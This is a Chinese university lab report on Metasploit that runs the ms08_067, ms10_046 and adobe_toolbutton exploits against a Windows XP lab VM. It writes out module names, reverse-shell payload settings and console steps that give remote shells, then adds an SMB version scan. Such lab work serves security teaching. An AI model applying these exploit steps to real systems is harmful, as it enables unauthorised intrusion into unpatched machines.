码迷,mamicode.com
首页 > 其他好文 > 详细

20154313 刘文亨 EXP5

时间:2018-05-01 23:37:37      阅读:127      评论:0      收藏:0      [点我收藏+]

标签:黑客   net   line   ever   roo   入侵   查看   tap   cut   

技术分享图片

20154313Exp5 MSF基础应用

20154313 刘文亨

 

一、 实践内容

目录

· 主动攻击:ms08_067漏洞攻击

· 对浏览器攻击:ms10_046漏洞攻击

· Adobe的漏洞攻击:adobe_toolbutton

· 辅助模块的应用:smb_version

实验环境配置

· 攻击机:Kali

· 靶机: `windows XP SP3(English)

 

二、 基础问题

问题:如用自己的话解释什么是exploit,payload,encode

①exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。

②payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。

③encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

 

三、实验过程

1. 主动攻击:ms08_067漏洞攻击

参考学长的报告内容,选用XP英文版虚拟机。

· 技术分享图片

 

· Kali上使用msfconsole指令进入msf控制台。

· 

kali主机键入search ms08_067 指令查询一下针对该漏洞可以运用的攻击模块:技术分享图片

 

· 

· 

键入use exploit/windows/smb/ms08_067_netapi ,使用该模块,再使用show payloads查看可以供我们使用的payload技术分享图片

 

· 技术分享图片

 

· 我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shellgeneric/shell_reverse_tcp。当payload,使用指令set payload generic/shell_reverse_tcppayload进行设置。

· 

接着使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):技术分享图片

 

· 

· 

设置完相应的参数后,再次使用show options对攻击的选项进行查看:技术分享图片

 

· 

· 

接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:技术分享图片

 

· 

2. 对浏览器攻击:ms10_046漏洞攻击

· 

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:技术分享图片

 

· 

· 

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用show payloads查看可以供我们使用的payload技术分享图片

 

· 

· 

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOSTLHOST都应该填攻击机的IP地址:

· 

· 

· 

· 

设置好参数后,进行查看:技术分享图片

 

· 

· 

使用exploit指令执行漏洞,可以看到生成了一个url:

· 技术分享图片

 

· 

在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功:
技术分享图片

 

技术分享图片

 

· 

· 

3. 对Adobe的漏洞攻击:adobe_toolbutton

先使用search adobe查询和adobe漏洞有关的模块,我选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块,设置回连的payload技术分享图片

 

· 

查看需要设置的参数:技术分享图片

 

· 

· 

设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:技术分享图片

 

技术分享图片

 

 

· 

然后将该文件传送到靶机上,并且在攻击机上打开监听:技术分享图片

 

· 

· 

将靶机中的pdf文件打开,攻击机成功获取到靶机shell技术分享图片

 

· 

4. 辅助模块的应用:smb_version

· 使用show auxiliary查看可以运用的辅助模块。技术分享图片

 

· 我使用的是scanner/smb/smb_version,用来对靶机的smb版本进行扫描。

· 

设置靶机的IP地址(也可以设置要扫描的一段范围),以及扫描使用的线程:技术分享图片

 

· 

· 

使用exploit指令开始扫描,成功扫描到靶机的smb版本:技术分享图片

 

· 

5. smb(ms17-010)远程命令执行之msf

· https://www.cnblogs.com/backlion/p/6804863.html
按照这个操作可以实现。

· 

四、 实验体会

   这次实验我懂得了很多系统和软件都存在着漏洞,我们要及时为其打好补丁,小心被黑客入侵,也可以尝试寻找各种漏洞攻入。

 

20154313 刘文亨 EXP5

标签:黑客   net   line   ever   roo   入侵   查看   tap   cut   

原文地址:https://www.cnblogs.com/liuwenheng/p/8977391.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!